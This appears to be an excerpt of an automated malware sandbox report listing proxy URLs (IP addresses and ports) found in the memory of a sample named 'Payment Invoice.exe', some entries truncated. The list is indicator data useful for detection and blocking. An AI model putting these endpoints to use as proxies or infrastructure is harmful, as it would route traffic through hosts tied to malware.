                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A28000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.248.35.153:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.248.35.153:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.21.200:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.21.200:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.179:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.179:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.8.8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631815A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.8.87.43:4444
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.8.87.43:4444://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.113.73.38:9331
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.113.73.38:9331://proxyp
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.124.36.75:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.124.36.75:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.145.209.187:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.145.209.187:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.150.69.56:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.150.69.56:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.159.94:46195
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.159.94:46195://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.182.187.78:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.182.187.78:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.35.70:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.35.70:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.213.208
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.213.208.226:8180
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.213.208.226:8180://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.247.173.17:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.247.173.17:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25517
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25517://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25900
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25900://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.62:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.62:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.91:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.91:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.79.44.158:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.79.44.158:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.65.34:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.73.54:31145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.73.54:31145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.172.161:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.172.161:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.243.38:49685
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.243.38:49685://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.184:19058
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.184:19058://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.221:64384
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.221:64384://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.43.221:64384HG
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.158.16.9:3128x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.169.35.214:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:52858
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:52858://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:58053
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:58053://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.147.185:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.147.185:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.246.166:5566
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.246.166:5566://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.74.57:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.74.57:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.93.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.93.234:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.93.234:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631834B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.25:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.25:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.129:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.129:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.145:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.145:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210.73:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210.73:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.40.17:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.40.17:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.44.184.138:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.44.184.138:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.61.44.54:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.61.44.54:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.155.237.74:8111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.155.237.74:8111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.155.237.74:8111r
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.244.135:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.244.135:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.85.163:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.85.163:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.14:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.14:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.17:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.17:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.36:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.36:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.58:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.58:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.242.146.109:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.242.146.109:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.248.86.237:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.248.86.237:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.251.236.227:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.251.236.227:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.101.13.110:37902
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.101.13.110:37902://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:6821
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:6821://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.122.10:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.122.10:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.83.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.83.206:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.83.206:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.20.116.86:9000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.20.116.86:9000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.229.203:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.229.203:15673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.52.241.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.52.241.13:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.52.241.13:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:38242
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:38242://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319667000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.229.185:64767
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.229.185:64767://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.84.3:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.84.3:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318462000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.170:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.170:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.104
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.104.70:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.104.70:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145://proxy
